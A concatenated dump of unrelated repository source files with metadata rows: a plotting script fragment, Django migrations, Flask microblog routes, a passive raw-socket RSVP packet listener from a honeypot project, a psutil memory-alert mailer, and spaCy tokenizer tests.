Xcentroids = np.r_[np.ones((winLen))*Xcentroids[0],Xcentroids,np.ones((winLen))*Xcentroids[-1]]
Xcentroids = np.convolve(w/w.sum(),Xcentroids,mode='same')[(winLen):-(winLen)]
Ycentroids = np.r_[np.ones((winLen))*Ycentroids[0],Ycentroids,np.ones((winLen))*Ycentroids[-1]]
Ycentroids = np.convolve(w/w.sum(),Ycentroids,mode='same')[(winLen):-(winLen)]
sz = math.ceil(maxRange/32)*16
fig = plt.figure()#figsize=(10, 10), dpi=5)
totalFrames =500
fc = 0
#with writer.saving(fig, "move.mp4", totalFrames):# len(posDF.groupby('frame'))):
for fnum, frame in posDF.groupby('frame'):
fc = fc + 1
if fc>totalFrames:
break
#frame = frame[frame.c_id==0]
xp = frame['x'].values
yp = frame['y'].values
xh = 0.1*frame['dx'].values
yh = 0.1*frame['dy'].values
xc = Xcentroids[fc]
yc = Ycentroids[fc]
plt.clf()
plt.quiver(gridPos[:,:,0],gridPos[:,:,1],grid[:,:,0],grid[:,:,1],angles='xy', scale_units='xy', scale=1.0/32.0, headwidth=1)
l, = plt.plot(xp,yp, 'ro')
plt.quiver(xp,yp,xh,yh,angles='xy', scale_units='xy', color='r', scale=1.0/32.0, headwidth=1.5)
#plt.axis([0,4000, 2000,-2000])
plt.axis('equal')
l.axes.get_xaxis().set_visible(False)
l.axes.get_yaxis().set_visible(False)
l.set_data(xp, yp)
l.axes.set_xlim(xc-sz,xc+sz)
l.axes.set_ylim(yc-sz,yc+sz)
plt.savefig('frames/fig'+'{0:05d}'.format(fc)+'.png')
#writer.grab_frame()
break
| [
"colin.j.torney@gmail.com"
] | colin.j.torney@gmail.com |
7db1a2988c552372fb5395ea469d95dd7642b33f | f561a219c57bd75790d3155acac6f54299a88b08 | /splash_screen/migrations/0001_initial.py | 595c80d3d3c899474e567d2f95d683c19e6bc3ae | [] | no_license | ujjwalagrawal17/OfferCartServer | 1e81cf2dc17f19fa896062c2a084e6b232a8929e | b3cd1c5f8eecc167b6f4baebed3c4471140d905f | refs/heads/master | 2020-12-30T15:31:04.380084 | 2017-05-24T18:26:20 | 2017-05-24T18:26:20 | 91,155,405 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,307 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-04-06 17:28
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial migration: creates the FcmData and VersionData tables.

    NOTE(review): 'created' uses auto_now=True (updated on every save) and
    'modified' uses auto_now_add=True (set once at creation) -- these look
    swapped relative to their names; verify before building on them.
    Migration files should otherwise stay byte-stable once applied.
    """

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='FcmData',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('fcm', models.CharField(blank=True, max_length=512, null=True)),
                ('created', models.DateTimeField(auto_now=True)),
                ('modified', models.DateTimeField(auto_now_add=True)),
            ],
        ),
        migrations.CreateModel(
            name='VersionData',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('version', models.SmallIntegerField(default=0)),
                ('compulsory_update', models.SmallIntegerField(default=0)),
                ('version_type', models.CharField(blank=True, max_length=120, null=True)),
                ('created', models.DateTimeField(auto_now=True)),
                ('modified', models.DateTimeField(auto_now_add=True)),
            ],
        ),
    ]
| [
"ujjwal.iitism@gmail.com"
] | ujjwal.iitism@gmail.com |
55845668b67565b8b7fe585c190c0dac8611d35d | 097c6263e0f30f54ce2deb8d4a6e4c2d8e5c675d | /app/routes.py | 850e06abf30295eeba4ea219d8f1e6fbdd850562 | [] | no_license | Abhay-1812/microblog3 | 1b5d15026ea22ef05cbfe457abd760cca322a069 | 82ba815b0346e2adf96f9cb6ede0bbaefb338748 | refs/heads/main | 2023-05-25T09:20:25.122622 | 2021-06-03T08:09:26 | 2021-06-03T08:09:26 | 373,429,493 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,145 | py | from app import app
from flask import render_template,url_for,flash,redirect
from app.forms import LoginForm
from app.models import User
from flask_login import current_user, login_user
from flask_login import logout_user
from flask_login import login_required
from flask import request
from werkzeug.urls import url_parse
from app import db
from app.forms import RegistrationForm
from datetime import datetime
from app.forms import EditProfileForm
from app.forms import EmptyForm
from app.forms import PostForm
from app.models import Post
from app.models import Comment
from app.forms import ResetPasswordRequestForm
from app.email import send_password_reset_email
from app.forms import ResetPasswordForm
from app.forms import AddCommentForm
from guess_language import guess_language
@app.route('/login', methods=['GET', 'POST'])
def login():
    """Render and process the sign-in form.

    Already-authenticated users are bounced to the home page. On a valid
    POST the user is logged in and redirected to the 'next' query target,
    falling back to the home page.
    """
    if current_user.is_authenticated:
        return redirect(url_for('index'))
    form = LoginForm()
    if form.validate_on_submit():
        user = User.query.filter_by(username=form.username.data).first()
        # Same message for unknown user and wrong password (no user enumeration).
        if user is None or not user.check_password(form.password.data):
            flash('Invalid username or password')
            return redirect(url_for('login'))
        login_user(user, remember=form.remember_me.data)
        next_page = request.args.get('next')
        # Open-redirect guard: only follow relative 'next' URLs
        # (an absolute URL has a non-empty netloc).
        if not next_page or url_parse(next_page).netloc != '':
            next_page = url_for('index')
        return redirect(next_page)
    return render_template('login.html', title='Sign In', form=form)
@app.route('/logout')
def logout():
    """End the current session and return the visitor to the home page."""
    logout_user()
    home = url_for('index')
    return redirect(home)
@app.route('/register', methods=['GET','POST'])
def register():
    """Render and process the sign-up form; create the user on success."""
    if current_user.is_authenticated:
        return redirect(url_for('index'))
    form = RegistrationForm()
    if form.validate_on_submit():
        user = User(username=form.username.data, email=form.email.data)
        # Only the password hash is stored, never the plain text.
        user.set_password(form.password.data)
        db.session.add(user)
        db.session.commit()
        flash('Congratulations, you are now a registered user!')
        return redirect(url_for('login'))
    return render_template('register.html', title='Register', form=form)
@app.route('/user/<username>')
@login_required
def user(username):
    """Profile page: the given user's posts, newest first, paginated."""
    user = User.query.filter_by(username=username).first_or_404()
    page = request.args.get('page', 1, type=int)
    posts = user.posts.order_by(Post.timestamp.desc()).paginate(
        page, app.config['POSTS_PER_PAGE'], False)
    next_url = url_for('user', username=user.username, page=posts.next_num) \
        if posts.has_next else None
    prev_url = url_for('user', username=user.username, page=posts.prev_num) \
        if posts.has_prev else None
    # EmptyForm supplies the CSRF token for the follow/unfollow buttons.
    form = EmptyForm()
    return render_template('user.html', user=user, posts=posts.items,
                           next_url=next_url, prev_url=prev_url, form=form)
@app.before_request
def before_request():
    """Refresh the logged-in user's last_seen timestamp on every request."""
    if current_user.is_authenticated:
        current_user.last_seen = datetime.utcnow()
        db.session.commit()
@app.route('/edit_profile', methods=['GET','POST'])
@login_required
def edit_profile():
    """Let the current user edit their username and about-me text."""
    form = EditProfileForm()
    if form.validate_on_submit():
        current_user.username = form.username.data
        current_user.about_me = form.about_me.data
        db.session.commit()
        flash('your changes have been saved.')
        return redirect(url_for('edit_profile'))
    elif request.method == 'GET':
        # Pre-fill the form with the stored values on first display.
        form.username.data = current_user.username
        form.about_me.data = current_user.about_me
    return render_template('edit_profile.html', title='Edit Profile', form = form)
# Bug fix: the URL rule contained a stray comma ('/follow/,<username>'),
# producing URLs like '/follow/,bob'. Internal links built with
# url_for('follow', ...) pick up the corrected rule automatically.
@app.route('/follow/<username>', methods=['POST'])
@login_required
def follow(username):
    """Make the current user follow *username* (POST only, CSRF-protected)."""
    form = EmptyForm()
    # validate_on_submit() here validates the CSRF token from EmptyForm.
    if form.validate_on_submit():
        user = User.query.filter_by(username=username).first()
        if user is None:
            flash('User not found')
            return redirect(url_for('index'))
        if user == current_user:
            flash('You cannot follow yourself!')
            return redirect(url_for('user',username=username))
        current_user.follow(user)
        db.session.commit()
        flash('You are following {}!'.format(username))
        return redirect(url_for('user',username=username))
    else:
        return redirect(url_for('index'))
# Bug fix: same stray comma as in the follow() rule ('/unfollow/,<username>').
@app.route('/unfollow/<username>', methods=['POST'])
@login_required
def unfollow(username):
    """Make the current user unfollow *username* (POST only, CSRF-protected)."""
    form = EmptyForm()
    if form.validate_on_submit():
        user = User.query.filter_by(username=username).first()
        if user is None:
            flash('User not found')
            return redirect(url_for('index'))
        if user == current_user:
            flash('You cannot unfollow yourself!')
            return redirect(url_for('user',username=username))
        current_user.unfollow(user)
        db.session.commit()
        flash('You are not following {}!'.format(username))
        return redirect(url_for('user',username=username))
    else:
        return redirect(url_for('index'))
@app.route('/',methods=['GET','POST'])
@app.route('/index',methods=['GET','POST'])
@login_required
def index():
    """Home feed: post submission form plus followed users' posts, paginated."""
    form = PostForm()
    if form.validate_on_submit():
        post = Post(body=form.post.data, author=current_user)
        db.session.add(post)
        db.session.commit()
        flash('Your post is now live!')
        # Post/Redirect/Get: avoid duplicate submission on refresh.
        return redirect(url_for('index'))
    # posts = current_user.followed_posts().all()
    page = request.args.get('page', 1, type=int)
    posts = current_user.followed_posts().paginate(page, app.config['POSTS_PER_PAGE'], False)
    next_url = url_for('index', page=posts.next_num) \
        if posts.has_next else None
    prev_url = url_for('index', page=posts.prev_num) \
        if posts.has_prev else None
    return render_template('index.html',title='Home Page',form=form,posts=posts.items,next_url=next_url,prev_url=prev_url)
@app.route('/explore')
@login_required
def explore():
    """Global feed: all users' posts, newest first, paginated.

    Bug fix: the pagination links were built with url_for('index'), so
    clicking next/prev dropped the visitor back onto the home feed; they
    now stay on the explore endpoint.
    """
    page = request.args.get('page', 1, type=int)
    posts = Post.query.order_by(Post.timestamp.desc()).paginate(page, app.config['POSTS_PER_PAGE'], False)
    next_url = url_for('explore', page=posts.next_num) \
        if posts.has_next else None
    prev_url = url_for('explore', page=posts.prev_num) \
        if posts.has_prev else None
    # Reuses the index template, but without the post-submission form.
    return render_template('index.html',title='Explore', posts=posts.items,next_url=next_url,prev_url=prev_url)
@app.route('/reset_password_request', methods=['GET', 'POST'])
def reset_password_request():
    """Send a password-reset email for the submitted address."""
    if current_user.is_authenticated:
        return redirect(url_for('index'))
    form = ResetPasswordRequestForm()
    if form.validate_on_submit():
        user = User.query.filter_by(email=form.email.data).first()
        # Email is only sent for known addresses, but the flash message is
        # identical either way, so addresses cannot be enumerated.
        if user:
            send_password_reset_email(user)
        flash('Check your email for the instructions to reset your password')
        return redirect(url_for('login'))
    return render_template('reset_request_password.html',
                           title='Reset Password', form=form)
@app.route('/reset_password/<token>', methods=['GET', 'POST'])
def reset_password(token):
    """Verify the emailed reset token and let the user set a new password."""
    if current_user.is_authenticated:
        return redirect(url_for('index'))
    user = User.verify_reset_password_token(token)
    # Invalid/expired token: silently fall back to the home page.
    if not user:
        return redirect(url_for('index'))
    form = ResetPasswordForm()
    if form.validate_on_submit():
        user.set_password(form.password.data)
        db.session.commit()
        flash('Your password has been reset.')
        return redirect(url_for('login'))
    return render_template('reset_password.html', form=form)
@app.route('/like/<int:post_id>/<action>')
@login_required
def like_action(post_id, action):
    """Like or unlike a post, then return to the page the click came from.

    *action* is 'like' or 'unlike'; anything else is a no-op redirect.

    Bug fix: request.referrer is None when the Referer header is absent
    (privacy settings, direct navigation), and redirect(None) fails; fall
    back to the home page in that case.
    """
    post = Post.query.filter_by(id=post_id).first_or_404()
    if action == 'like':
        current_user.like_post(post)
        db.session.commit()
    if action == 'unlike':
        current_user.unlike_post(post)
        db.session.commit()
    return redirect(request.referrer or url_for('index'))
@app.route('/post/<int:post_id>/comment', methods=["GET", "POST"])
@login_required
def add_comment(post_id):
    """Attach a comment by the current user to the given post."""
    post = Post.query.filter_by(id=post_id).first_or_404()
    form = AddCommentForm()
    if form.validate_on_submit():
        # NOTE(review): 'author' receives a user id while Post uses the
        # object itself, and 'title' receives the Post object -- verify
        # these keyword names against the Comment model definition.
        comment = Comment(body=form.body.data,author=current_user.id,title=post)
        db.session.add(comment)
        db.session.commit()
        flash("Your comment has been added to the post", "success")
        return redirect(url_for("user", username=current_user.username))
    return render_template("comments.html",title="Comment post",form=form,post_id=post_id)
| [
"dhillonabhay1@gmail.com"
] | dhillonabhay1@gmail.com |
0c6f4a15555b5ae5f9e16ca3aed6a1cfae5f982f | 4513fae798d527f55501f42b856c3412766062a9 | /products/migrations/0001_initial.py | 54683f5691c93f6953b3730aff1863d5f81ec3fc | [] | no_license | bearadamsj/dj1 | c4ac78c74e68cd4051116ea630a23cde8800394b | 2bc55b9449c7cd64d65a1a7f785933fe9b612903 | refs/heads/master | 2023-03-28T14:17:10.795041 | 2021-04-01T00:51:13 | 2021-04-01T00:51:13 | 353,528,517 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 720 | py | # Generated by Django 3.1.7 on 2021-03-19 05:47
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Product',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=120)),
('description', models.TextField(blank=True, null=True)),
('price', models.DecimalField(decimal_places=2, max_digits=1000000)),
('summary', models.TextField(default='this is cool!')),
],
),
]
| [
"zhu11&dmin@bitzer.cn"
] | zhu11&dmin@bitzer.cn |
4693d1d06b71c1fb2a188430faad444dcb9116db | 2f6f7c056df8ed13273866cc4ed5bcc0e49c4d93 | /catch_all/catch_rsvp | 248edc70e7d6f21a36287d148c164e0c2bd13c1f | [] | no_license | ssem/honeypots | 8e5eccc614536d05d977a2b5fa93839f06f5cec7 | 7f137f69e88f671d69f3de91b30e160b7ebb0419 | refs/heads/master | 2021-01-18T21:34:03.110770 | 2016-04-18T20:25:02 | 2016-04-18T20:25:02 | 31,721,862 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,083 | #!/usr/bin/env python
import os
import sys
import struct
import socket
import select
import argparse
class Catch_All:
    """Sniff IPPROTO_RSVP traffic on a raw socket and print endpoints.

    Raw sockets require root; the __main__ guard checks for it.
    """

    def __init__(self):
        self.socket = socket.socket(socket.AF_INET,
                                    socket.SOCK_RAW,
                                    socket.IPPROTO_RSVP)

    def __del__(self):
        # Best-effort close; the socket may never have been created.
        try:
            self.socket.close()
        except Exception:
            pass

    def _unpack_ip_header(self, packet):
        """Decode the first 40 bytes (IP header + transport header) of a packet.

        Returns a dict of header fields; addresses are dotted-quad strings.

        Bug fix: the original dict literal repeated the keys 'flags' and
        'checksum', so the IP-level values (header[4] and header[7]) were
        silently discarded by the later duplicates. They are now exposed as
        'ip_flags' and 'ip_checksum', while 'flags'/'checksum' keep their
        previous (transport-level) values for backward compatibility.
        """
        header = struct.unpack('!BBHHHBBH4s4sHHLLBBHHH', packet[0:40])
        return {'dsf': header[1],
                'total_length': header[2],
                'id': header[3],
                'ip_flags': header[4],          # IP flags + fragment offset
                'ttl': header[5],
                'protocol': header[6],
                'ip_checksum': header[7],       # IP header checksum
                'src_ip': socket.inet_ntoa(header[8]),
                'dst_ip': socket.inet_ntoa(header[9]),
                'src_port': header[10],
                'dst_port': header[11],
                'seq': header[12],
                'ack': header[13],
                'length': header[14],
                'flags': header[15],            # transport-level flags
                'windows': header[16],
                'checksum': header[17],         # transport-level checksum
                'urg_pnt': header[18]}

    def _pretty_print(self, ip_h):
        # One line per packet: "src_ip:src_port -> dst_ip:dst_port".
        msg = '%s:%s -> %s:%s\n' % (ip_h['src_ip'], ip_h['src_port'],
                                    ip_h['dst_ip'], ip_h['dst_port'])
        sys.stdout.write(msg)

    def run(self):
        """Block on the raw socket forever, printing each captured packet."""
        while True:
            try:
                inp, outp, exceptions = select.select([self.socket], [], [])
                for sock in inp:
                    packet, source = sock.recvfrom(1024)
                    ip_h = self._unpack_ip_header(packet)
                    self._pretty_print(ip_h)
            except KeyboardInterrupt:
                exit('bye')
            except Exception as e:
                # Keep sniffing on malformed packets or transient errors.
                sys.stderr.write('[ERROR] %s\n' % e)
if __name__ == "__main__":
if os.geteuid() != 0:
exit("must run as root")
parser = argparse.ArgumentParser()
args = parser.parse_args()
CA = Catch_All()
CA.run()
| [
"ssem@tacnetsol.com"
] | ssem@tacnetsol.com | |
5aaefe82f83adb270dd3fb0e626bee58be47b308 | 13cf5e8616e2f1bfbacd360d6c60a1b8b48b3b5a | /16/part2.py | c557dc0deb9de57a238ba9b7a8ce3481dc2501f3 | [] | no_license | uwatm8/aoc2020 | e73aed7d8c9dfddf0bff53139d2625d3fda46699 | be4170a455b64d10c63434b817a0fbf454b18304 | refs/heads/main | 2023-02-06T10:40:43.852449 | 2020-12-28T01:14:22 | 2020-12-28T01:14:22 | 319,053,533 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,219 | py | filepath = 'data.txt'
l = []
with open(filepath) as fp:
line = fp.readline()
while line:
l.append(line.strip())
line = fp.readline()
nls = len(l)
ans = 0
fields = {}
hasFields = False
newyt = False
mynums = []
nearbynums = []
def canBeIndex(i, n):
key = list(fields.keys())[i]
if (n >= fields[key]['min1'] and n <= fields[key]['max1']) or (n >= fields[key]['min2'] and n <= fields[key]['max2']):
return True
return False
def de(n):
n = int(n)
for f in fields:
if f != None:
if (n >= fields[f]['min1'] and n <= fields[f]['max1']) or (n >= fields[f]['min2'] and n <= fields[f]['max2']):
return True
return False
for i in range(nls):
tl = l[i]
if not hasFields:
fn = tl.split(': ')[0]
if not fn:
hasFields = True
continue
min1 = int(tl.split(': ')[1].split(' or ')[0].split('-')[0])
max1 = int(tl.split(': ')[1].split(' or ')[0].split('-')[1])
min2 = int(tl.split(': ')[1].split(' or ')[1].split('-')[0])
max2 = int(tl.split(': ')[1].split(' or ')[1].split('-')[1])
fields[fn] = {'min1': min1, 'max1': max1, 'min2': min2, 'max2': max2}
if False:
print(min1)
print(max1)
print(min2)
print(max2)
print(" ")
continue
if i == len(fields) + 2:
for n in tl.split(','):
mynums.append(n)
if i > len(fields) + 4:
nums = []
for n in tl.split(','):
nums.append(int(n))
nearbynums.append(nums)
ts = tl.split(',')
rr = []
for nn in nearbynums:
for n in nn:
if(not de(n)):
rr.append(nn)
for r in rr:
nearbynums.remove(r)
indexes = []
columnCanBeField = []
for f in range(len(fields)):
columnCanBeField.append({})
for i in range(len(nearbynums[0])):
if not i in columnCanBeField[f]:
columnCanBeField[f][i] = True
def removekey(d, key):
    """Return a shallow copy of dict *d* without *key*.

    The caller's dict is never mutated.  Raises KeyError when *key* is
    absent, matching plain ``del`` semantics.  (A leftover debug
    ``print(d)`` was removed.)
    """
    r = dict(d)
    del r[key]
    return r
# For every (field, column) pair, rule the column out as soon as any valid
# nearby ticket has a value the field rejects.
for f in range(len(fields)):
    for nn in range(len(nearbynums)):
        for n in range(len(nearbynums[nn])):
            if canBeIndex(f, nearbynums[nn][n]):
                # print(canBeIndex(f, nearbynums[nn][n]))
                continue
            else:
                # print(canBeIndex(f, nearbynums[nn][n]))
                columnCanBeField[f][n] = False
def hasOnlyOne(d):
    """Return True when exactly one value in dict *d* is truthy."""
    truthy_count = sum(1 for flag in d.values() if flag)
    return truthy_count == 1
def theOne(d):
    """Return the position (insertion order) of the first truthy value in *d*."""
    for position, flag in enumerate(d.values()):
        if flag:
            return position
    return None
def prune(n):
    """Mark column *n* as impossible for every field."""
    # columnCanBeField holds one possibility map per field (built with the
    # same length as `fields`), so iterating the rows covers every field.
    for possibilities in columnCanBeField:
        possibilities[n] = False
# Repeatedly assign any field whose candidate map has exactly one live
# column, then prune that column everywhere else (constraint propagation).
column = {}  # field name -> resolved column index
for i in range(len(fields) + 3):
    for f in range(len(fields)):
        if hasOnlyOne(columnCanBeField[f]):
            to = theOne(columnCanBeField[f])
            column[list(fields.keys())[f]] = to
            # NOTE(review): this inner loop calls prune(to) once per column,
            # but a single call already clears the whole column — redundant.
            for j in range(len(columnCanBeField[f])):
                prune(to)
# Multiply my ticket's values for every "departure*" field.
ans = 1
for key in fields.keys():
    if key.count('departure'):
        ans *= int(mynums[column[key]])
print("answer: ", ans)
| [
"hasta@student.chalmers.se"
] | hasta@student.chalmers.se |
70e757c0fdeae8986311446c704fac3633df52cf | a9fc0a578d6cbc3104a7a08f0f009e5a37c42f74 | /src/bag3_testbenches/measurement/pnoise/base.py | 2409b0c936c02c056038f5107408efacf0067e8f | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | zhaokai-l/bag3_testbenches | f832e3336a2ffe486f118d16822d8297e47f61dd | 334f0f0ab4eae2931c3ede5471b152329840bf86 | refs/heads/master | 2023-06-27T11:41:20.749692 | 2021-07-25T23:48:48 | 2021-07-25T23:48:48 | 297,793,219 | 1 | 0 | null | 2020-09-22T23:04:12 | 2020-09-22T23:04:11 | null | UTF-8 | Python | false | false | 2,913 | py | from typing import Any, Union, Sequence, Tuple, Optional, Mapping, Iterable, List, Set, Dict, Type
import abc
import numpy as np
from bag.simulation.data import SimData, AnalysisType
from bag.design.module import Module
from bag.simulation.core import TestbenchManager
from bag.simulation.data import SimNetlistInfo, netlist_info_from_dict
from bag3_liberty.data import parse_cdba_name, BusRange
from ..tran.analog import AnalogTranTB
from ...schematic.digital_tb_tran import bag3_testbenches__digital_tb_tran
from ...schematic.analog_tb_tran import bag3_testbenches__analog_tb_tran
class PNoiseTB(AnalogTranTB):
    """Transient testbench extended with a PSS + sampled PNOISE + PAC chain.

    Reads optional settings from ``self.specs['pnoise_options']`` and builds
    the three analysis dictionaries consumed by ``netlist_info_from_dict``.
    """

    def __init__(self, *args: Any, **kwargs: Any) -> None:
        super().__init__(*args, **kwargs)

    def get_netlist_info(self) -> SimNetlistInfo:
        """Build the simulation netlist info with PSS, PNOISE and PAC analyses."""
        specs = self.specs
        pnoise_options: Mapping[str, Any] = specs.get('pnoise_options', {})
        trigger_dir = pnoise_options.get('trigger_dir', 'rise')
        probe_thres = pnoise_options.get('probe_thres', 'v_VDD/2')
        probe_pin = pnoise_options.get('probe_pins', '[outp outn]')
        # NOTE(review): this mutates the shared specs mapping in place, and
        # raises KeyError when 'pnoise_options' is absent (the {} default has
        # no 'events' key) — confirm callers always supply events['pm'].
        pnoise_options['events']['pm'] += f' trigger={probe_pin} target={probe_pin} triggerthresh={probe_thres} ' \
                                          f'triggerdir={trigger_dir}'
        # Periodic steady-state analysis at the fundamental 1/t_per.
        pss_dict = dict(
            type='PSS',
            fund='1/t_per',
            options=dict(
                harms=pnoise_options.get('harms', 100),
                errpreset=pnoise_options.get('errpreset', 'conservative'),
                tstab=pnoise_options.get('tstab', 0),
                autosteady=pnoise_options.get('autosteady', 'yes'),
                maxacfreq=1e10,
            ),
            save_outputs=self.save_outputs,
        )
        # Sampled periodic noise analysis from 1 Hz to Nyquist (0.5/t_per).
        pnoise_dict = dict(
            type='PNOISE',
            start=1,
            stop='0.5/t_per',
            options=dict(
                pnoisemethod=pnoise_options.get('pnoisemethod', 'fullspectrum'),
                noisetype=pnoise_options.get('noisetype', 'sampled'),
                saveallsidebands='yes',
                lorentzian='yes',
            ),
            events=pnoise_options['events'],
            save_outputs=self.save_outputs,
        )
        # Periodic AC analysis sampled at the same threshold crossing.
        pac_dict = dict(
            type='PAC',
            p_port=pnoise_options.get('p_port', 'outp'),
            n_port=pnoise_options.get('n_port', 'outn'),
            start=pnoise_options.get('ac_start', 1),
            stop=pnoise_options.get('ac_stop', 100e9),
            options=dict(
                crossingdirection=trigger_dir,
                thresholdvalue=probe_thres,
                maxsideband=0,
                sweeptype='relative',
                ptvtype='sampled'
            ),
            save_outputs=self.save_outputs,
        )
        sim_setup = self.get_netlist_info_dict()
        sim_setup['analyses'] = [pss_dict, pnoise_dict, pac_dict]
        return netlist_info_from_dict(sim_setup)
| [
"zhaokai_liu@berkeley.edu"
] | zhaokai_liu@berkeley.edu |
986d1d6dde1c0148d0569a83ed87756fdccbf521 | b6f9a54c9b237e45df67170c7dfdf26e73d8ab19 | /Monitor.py | b4b6935ba5909a7f853e487fdea240645f620b1d | [] | no_license | nfrjy/python | 094822483f6f95ef9465ceeb71935a5335113d5d | 53de810ce26cf73103dc9be72ee694434017e7aa | refs/heads/master | 2021-01-10T07:08:30.151757 | 2020-01-20T07:08:09 | 2020-01-20T07:08:09 | 45,826,996 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,903 | py | #!/usr/bin/python
#codeing:utf-8
from typing import Union
import psutil
import os
import smtplib
import configparser
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.image import MIMEImage
from email.mime.audio import MIMEAudio
from email.mime.application import MIMEApplication
import mimetypes
import os
class MyMail:
    """Thin SMTP mail sender configured from an INI file.

    The config file must contain an [SMTP] section with the keys
    login_user, login_pwd, from_user, to_user, host and port.
    ``to_user`` is stored as the raw config string and is expected to
    look like a Python list literal of addresses (it is eval'ed when
    sending).
    """

    def __init__(self, mail_config_file):
        config = configparser.ConfigParser()
        config.read(mail_config_file)
        # smtplib.SMTP() with no arguments does NOT connect yet;
        # connect() must be called explicitly before sending.
        self.smtp = smtplib.SMTP()
        self.login_user = config.get('SMTP', 'login_user')
        self.login_pwd = config.get('SMTP', 'login_pwd')
        self.from_addr = config.get('SMTP', 'from_user')
        self.to_addrs = config.get('SMTP', 'to_user')
        self.host = config.get('SMTP', 'host')
        self.port = config.get('SMTP', 'port')

    def connect(self):
        """Open the TCP connection to the configured SMTP host/port."""
        self.smtp.connect(self.host, self.port)

    def login(self):
        """Authenticate against the SMTP server; failures are printed, not raised."""
        try:
            self.smtp.login(self.login_user, self.login_pwd)
        except Exception as e:
            print('%s' % e)

    def sendmessage(self, mail_subject, mail_content, attachment_path_set):
        """Send *mail_content* under *mail_subject* with the given attachments.

        attachment_path_set is an iterable of file paths; paths that do
        not exist are silently skipped.
        """
        msg = MIMEMultipart()
        msg['From'] = self.from_addr
        # NOTE(review): eval on config data is risky if the config file is
        # not trusted; ast.literal_eval would be safer.
        msg['To'] = ','.join(eval(self.to_addrs))
        msg['Subject'] = mail_subject
        Content = MIMEText(mail_content, _charset='gbk')
        msg.attach(Content)
        for attachment_path in attachment_path_set:
            if os.path.exists(attachment_path):
                mime_type, coding = mimetypes.guess_type(attachment_path)
                if mime_type is None:
                    mime_type = 'application/octet-stream'
                major_type, minor_type = mime_type.split('/', 1)
                with open(attachment_path, 'rb') as fh:
                    if major_type == 'text':
                        attachment = MIMEText(fh.read(), _subtype=minor_type)
                    elif major_type == 'image':
                        attachment = MIMEImage(fh.read(), _subtype=minor_type)
                    elif major_type == 'application':
                        attachment = MIMEApplication(fh.read(), _subtype=minor_type)
                    elif major_type == 'audio':
                        attachment = MIMEAudio(fh.read(), _subtype=minor_type)
                    else:
                        # Bug fix: any other major type (e.g. video/*) used to
                        # leave `attachment` unbound and raise NameError; fall
                        # back to a generic binary attachment.
                        attachment = MIMEApplication(fh.read())
                    attachment_name = os.path.basename(attachment_path)
                    attachment.add_header('Content-Disposition', 'attachment', filename=('gbk', '', attachment_name))
                    msg.attach(attachment)
        full_text = msg.as_string()
        self.smtp.sendmail(self.from_addr, eval(self.to_addrs), full_text)

    def logout(self):
        """Close the SMTP session."""
        self.smtp.quit()
class Mem_Monitor:
    """Samples total/used physical memory via psutil and reports usage."""

    def Get_MemTotal(self):
        """Cache and return total physical memory in bytes."""
        self.MemTotal = psutil.virtual_memory().total
        return self.MemTotal

    def Get_MemUsed(self):
        """Cache and return used physical memory in bytes."""
        self.MemUsed = psutil.virtual_memory().used
        return self.MemUsed

    def Used_Percent(self):
        """Return used/total as a percentage (0.0-100.0).

        Requires Get_MemTotal() and Get_MemUsed() to have been called
        first so self.MemTotal and self.MemUsed exist.
        """
        # Bug fix: float(used / total) truncated to 0 under Python 2's
        # integer division; convert BEFORE dividing so the ratio survives.
        self.used_percent = float(self.MemUsed) / float(self.MemTotal) * 100
        return self.used_percent
if __name__=="__main__":
    # One-shot check: send an alert mail when memory usage exceeds 80%.
    Monitor = True
    gitlabMem = Mem_Monitor()
    gitlabMem.Get_MemTotal()
    gitlabMem.Get_MemUsed()
    gitlabMem.Used_Percent()
    if int(gitlabMem.Used_Percent()) > 80:
        if Monitor == True:
            mymail = MyMail('./mail.conf')
            mymail.connect()
            mymail.login()
            # Bug fix: the "total memory" placeholder previously repeated
            # Get_MemUsed(); report the real total instead.
            mail_content = "Gitlab服务器内存详情:总内存: %s,已使用内存: %s,使用占比: %s %%," % (gitlabMem.Get_MemTotal(), gitlabMem.Get_MemUsed(), gitlabMem.Used_Percent())
            # Bug fix: the string "None" was passed as the attachment set and
            # would be iterated character by character; pass no attachments.
            mymail.sendmessage("Gitlab 服务器内存告警", mail_content, [])
            mymail.logout()
            Monitor = False
    else:
        Monitor = True
| [
"58209376@qq.com"
] | 58209376@qq.com |
57ce4e23c369d0ac1c8990a08dd6f14bffa13f86 | ef3a7391b0a5c5d8e276355e97cbe4de621d500c | /venv/Lib/site-packages/spacy/tests/lang/en/test_exceptions.py | 6285a94089db310ac5481689b6030d62f9ea8679 | [
"Apache-2.0"
] | permissive | countBMB/BenjiRepo | 143f6da5d198ea6f06404b4559e1f4528b71b3eb | 79d882263baaf2a11654ca67d2e5593074d36dfa | refs/heads/master | 2022-12-11T07:37:04.807143 | 2019-12-25T11:26:29 | 2019-12-25T11:26:29 | 230,090,428 | 1 | 1 | Apache-2.0 | 2022-12-08T03:21:09 | 2019-12-25T11:05:59 | Python | UTF-8 | Python | false | false | 4,097 | py | # coding: utf-8
from __future__ import unicode_literals
import pytest
def test_en_tokenizer_handles_basic_contraction(en_tokenizer):
    # "don't" splits into ["do", "n't"], plus the following word.
    text = "don't giggle"
    tokens = en_tokenizer(text)
    assert len(tokens) == 3
    assert tokens[1].text == "n't"
    # Sentence-final punctuation is split off as its own token.
    text = "i said don't!"
    tokens = en_tokenizer(text)
    assert len(tokens) == 5
    assert tokens[4].text == "!"
@pytest.mark.parametrize("text", ["`ain't", """"isn't""", "can't!"])
